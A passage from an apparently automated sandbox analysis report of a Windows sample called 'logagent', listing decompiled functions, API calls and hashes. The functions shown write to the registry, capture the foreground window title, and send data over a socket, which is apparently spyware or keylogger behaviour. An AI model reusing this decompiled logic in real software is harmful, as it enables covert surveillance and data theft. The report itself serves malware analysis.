                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                  • malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                  • String ID:
                                  • API String ID: 531887698-0
                                  • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                  • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B708 Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 28%
                                  			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
				char* _t13;
				long _t15;
				void* _t18;
				int _t19;
				void* _t25;

				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
				if(_t13 != 0) {
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1;
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}








                                  0x0040b715
                                  0x0040b71d
                                  0x0040b76a
                                  0x0040b773
                                  0x0040b71f
                                  0x0040b724
                                  0x0040b72e
                                  0x0040b735
                                  0x0040b741
                                  0x0040b74c
                                  0x0040b754
                                  0x0040b756
                                  0x0040b756
                                  0x0040b75b
                                  0x0040b766
                                  0x0040b766

                                  APIs
                                  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                  • RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                  • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 2159132150-0
                                  • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                  • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B522 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                  • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                  • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 2462357041-0
                                  • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                  • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040309E Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2505548081-0
                                  • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                  • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B692 Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v1028;
				long _t16;
				long _t19;

				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					L3:
					return 0;
				} else {
					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed
					RegCloseKey(_a8); // executed
					if(_t19 != 0) {
						goto L3;
					} else {
						E00402F9B( &_v1028, _a24, _a28);
						E00403010( &_v1028, _a16, _a20);
						return 1;
					}
				}
			}






                                  0x0040b6ac
                                  0x0040b6b4
                                  0x0040b704
                                  0x0040b707
                                  0x0040b6b6
                                  0x0040b6c8
                                  0x0040b6d3
                                  0x0040b6dc
                                  0x00000000
                                  0x0040b6de
                                  0x0040b6ea
                                  0x0040b6fb
                                  0x0040b703
                                  0x0040b703
                                  0x0040b6dc

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                  • RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                  • RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction ID: 12c492740cd6cd608dd50e7b32a974a13a24a52f7ce3ce9e30b48251fadff788
                                  • Opcode Fuzzy Hash: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction Fuzzy Hash: CA01FB35100209FFDF119F90EC05FDA3B75FB88758F008025FA14A61A0D775D925EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B4C8 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;
				signed int _t21;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000;
				}
			}









                                  0x0040b4cf
                                  0x0040b4d0
                                  0x0040b4d3
                                  0x0040b4e7
                                  0x0040b4ef
                                  0x0040b521
                                  0x0040b4f1
                                  0x0040b505
                                  0x0040b510
                                  0x0040b51d
                                  0x0040b51d

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                  • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                  • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                  • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412660 Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00412660(intOrPtr _a4) {
				char _v5;
				short _v520;
				struct HWND__* _t6;

				_t6 = GetForegroundWindow(); // executed
				GetWindowTextW(_t6,  &_v520, 0x200);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5);
				return _a4;
			}






                                  0x00412669
                                  0x0041267c
                                  0x00412690
                                  0x0041269a

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00412669
                                  • GetWindowTextW.USER32 ref: 0041267C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412690
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                  • String ID:
                                  • API String ID: 3479648101-0
                                  • Opcode ID: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction ID: 64d1ce8039e3a540394b6b1977bfd4dfbb3997696942590b923d2ce918142fcd
                                  • Opcode Fuzzy Hash: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction Fuzzy Hash: 40E0ECB950030FEBDB04EBA0ED4DED9777CAB44309F0081A1B61697191DA74A6498F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004122C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004122C4(intOrPtr* _a4) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr* _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				_t8 = _a4;
				 *_t8 = _v68.ullTotalPhys;
				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
				return _t8;
			}





                                  0x004122cd
                                  0x004122d5
                                  0x004122db
                                  0x004122e1
                                  0x004122e6
                                  0x004122ea

                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?), ref: 004122D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID: @
                                  • API String ID: 1890195054-2766056989
                                  • Opcode ID: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction ID: 75f814dcae9d38af4eaa51e93271515a162649f50c927f4fe6c9e38d045eb332
                                  • Opcode Fuzzy Hash: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction Fuzzy Hash: E8D067B8901308DFCB04DF94D54999CBBB9BB48344F404058E906A7350DB74E905CA95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B8F8 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                  • String ID:
                                  • API String ID: 4160275866-0
                                  • Opcode ID: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                  • Opcode Fuzzy Hash: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020C2 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                  • String ID:
                                  • API String ID: 868658090-0
                                  • Opcode ID: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction ID: d9a2345f5f1697b642a9e7ab7bc87c8d23e46c7080ea0e2ac139fbaf6b3ea179
                                  • Opcode Fuzzy Hash: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction Fuzzy Hash: 97D0123650011CBBCB007FE9EC098D97B68DB452A5740C465FE1587261EA729620D7D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413E46 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __dllonexit_onexit
                                  • String ID:
                                  • API String ID: 2384194067-0
                                  • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                  • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C00000 Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlExitUserThread.NTDLL(00000000), ref: 00C00023
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.533321299.0000000000C00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_c00000_logagent.jbxd
                                  Similarity
                                  • API ID: ExitThreadUser
                                  • String ID:
                                  • API String ID: 3424019298-0
                                  • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                  • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                  • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                  • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00970000 Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlExitUserThread.NTDLL(00000000), ref: 00970023
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.533142771.0000000000970000.00000040.00000400.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_970000_logagent.jbxd
                                  Similarity
                                  • API ID: ExitThreadUser
                                  • String ID:
                                  • API String ID: 3424019298-0
                                  • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                  • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                  • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                  • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402038 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00402038(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr* _t9;

				_t9 = __ecx;
				if( *0x41b730 != 0) {
					L2:
					_push(6);
					_push(1);
